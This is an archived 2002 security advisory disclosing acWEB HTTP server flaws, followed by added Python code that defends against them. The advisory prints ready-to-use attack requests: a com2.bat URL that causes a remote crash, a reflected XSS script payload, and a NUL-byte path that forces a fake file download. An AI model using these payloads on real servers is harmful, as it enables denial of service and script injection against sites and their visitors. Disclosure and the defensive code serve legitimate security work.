IIL Advisory: Vulnerabilities in acWEB HTTP server

From: DownBload (downbloadat_private)
Date: Wed Sep 25 2002 - 02:08:20 PDT

                    [ Illegal Instruction Labs Advisory ]
    [-------------------------------------------------------------------------]
    Advisory name: Vulnerabilities in acWEB HTTP server
    Advisory number: 13
    Application: acWEB HTTP server
    Author e-mail: spfat_private
    Homepage: somewhere on sourceforge
    Date: 10.09.2002
    Impact: DoS, XSS, etc.
    Tested on: Windows 98
    Discovered by: DownBload
    Mail me @: downbloadat_private
    
    
    
    
    ======[ Overview 
    
    Sourceforge: "acWEB is an OpenSource replacement for MS IIS and other 
    proprietary WEB servers for Windows. Unlike IIS, acWEB is not affected by 
    viruses like CodeRed, Nimda, etc :)."
    
    /ME says: acWEB is a simple HTTP server for Windows. It is well suited to tiny 
    companies and to home use.
    
    
    
    
    ======[ Problem(s)  	
    
    ===[ Remote DoS
    The first vulnerability I discovered in the acWEB HTTP server is a remote DoS.
    It is possible to crash acWEB (and Windows too) with a simple HTTP request.
    The file name "com2.bat" is resolved by Windows to the reserved device name
    COM2 (the extension and case are ignored), so the server ends up opening the
    serial port instead of a file:
    ---cut here---
    http://www.victim.com/com2.bat 
    ---cut here---
    
    
    ===[ XSS a.k.a CSS bug
    The script in the request path is reflected, unescaped, into the page acWEB 
    returns, so it executes in the visitor's browser:
    ---cut here---
    http://www.victim.com/%db<script>alert('Illegal%20Instruction%20Labs%200wnz%20YoU!!!');</script>/
    ---cut here---
    
    
    ===[ Fake file download
    ---cut here---
    http://www.victim.com/|%5chacked.txt%00
    ---cut here---
    
    When this request is sent to the acWEB HTTP server, acWEB returns:
    ---------------
    HTTP/1.0 200 OK
    Content-Length: 0
    Connection: Close
    Content-Type: application/octet-stream
    Server: Eserv/3.x
    
    ---------------
    That is weird, because the file 'hacked.txt' does not exist. The acWEB HTTP 
    server nevertheless answers 200 OK with Content-Type application/octet-stream 
    and a zero-length body, so the browser offers the visitor an empty file named 
    'hacked.txt' to download. The name is entirely attacker-chosen from the URL 
    (note the '|', the encoded backslash and the trailing %00 NUL byte).
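All three requests above get past acWEB's request-path handling. As an added example, not code from the advisory or from acWEB itself (whose source is not shown here), the following Python shows the checks a Windows HTTP server should run on the request path before it touches the file system, and the escaped 404 page that makes the reflected script inert. The function names and the demo inputs are constructed for this page; the reserved-name list is the standard Windows one.

```python
"""Request-path filter and safe error page for a Windows HTTP server.

Added example, not acWEB's code. The three request paths from the advisory
are used as constructed demo input.
"""
import html
from urllib.parse import unquote

# Windows reserved device names. A file name whose base is one of these is
# resolved to the device itself regardless of case or extension, so opening
# "com2.bat" as a file actually opens the COM2 serial port (the DoS above).
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{n}" for n in range(1, 10)}
    | {f"LPT{n}" for n in range(1, 10)}
)


def is_reserved_device(segment: str) -> bool:
    """True if one path segment names a Windows device.

    Windows matches device names case-insensitively, ignores the extension,
    and strips trailing spaces, so normalise all of that before comparing.
    """
    base = segment.split(".", 1)[0].rstrip(" ")
    return base.upper() in RESERVED_DEVICES


def validate_request_path(raw_path: str) -> tuple[bool, str]:
    """Check the percent-encoded path from the request line.

    Returns (accepted, reason). The rejections map to the advisory:
      reserved device names      -> the com2.bat remote DoS
      NUL bytes, '|' and '\\'    -> the |\\hacked.txt%00 fake download
    """
    path = unquote(raw_path)  # %00 -> NUL, %5c -> backslash, %7c -> pipe
    if "\x00" in path:
        return False, "NUL byte in path"
    if any(ord(ch) < 0x20 for ch in path):
        return False, "control character in path"
    for ch in ("\\", "|"):  # never legal in a URL path; both confuse Windows name rules
        if ch in path:
            return False, f"forbidden character {ch!r} in path"
    segments = [s for s in path.split("/") if s]
    if any(seg == ".." for seg in segments):
        return False, "parent-directory traversal"
    for seg in segments:
        if is_reserved_device(seg):
            return False, f"reserved device name {seg!r}"
    return True, "ok"


def not_found_page_unsafe(path: str) -> str:
    """404 body that echoes the request path verbatim: the reflected XSS pattern."""
    return f"<html><body><h1>404</h1>{path} not found</body></html>"


def not_found_page(path: str) -> str:
    """404 body that HTML-escapes the echoed path, so <script> arrives inert."""
    return f"<html><body><h1>404</h1>{html.escape(path, quote=True)} not found</body></html>"


# Constructed demo input: the three advisory requests plus a benign one.
DEMO_PATHS = [
    "/com2.bat",
    "/%db<script>alert('Illegal%20Instruction%20Labs%200wnz%20YoU!!!');</script>/",
    "/|%5chacked.txt%00",
    "/index.html",
]

if __name__ == "__main__":
    for raw in DEMO_PATHS:
        ok, why = validate_request_path(raw)
        print(f"{raw!r:<82} {'ACCEPT' if ok else 'REJECT'}: {why}")
        if ok:
            # Only accepted paths ever reach a handler; show what a 404 would echo.
            print("    escaped 404 body:", not_found_page(unquote(raw)))
```

The XSS request is deliberately still accepted by the path filter: a path containing `<` is not itself dangerous, the bug is echoing it unescaped, so the fix belongs in the response builder (`not_found_page`) rather than in the filter. Decoding happens exactly once before any check so that `%00` and `%5c` cannot slip through as text.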
    
    
    
    
    ======[ Exploit
    
    This can be exploited with a browser, so I won't write an exploit for this... or 
    maybe one day :).
    
    
    
    
    ======[ Greetz 
    
    Greetz go to #hr.hackers, #ii-labs and #linux <irc.carnet.hr>. 
    Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis, 
    Fr1c, phreax, LekaMan, StYx, harlequin, Astral and www.active-security.org 
    (NetZero & Paradox). I'm very sorry if I forgot someone.
    



    This archive was generated by hypermail 2b30 : Wed Sep 25 2002 - 09:30:25 PDT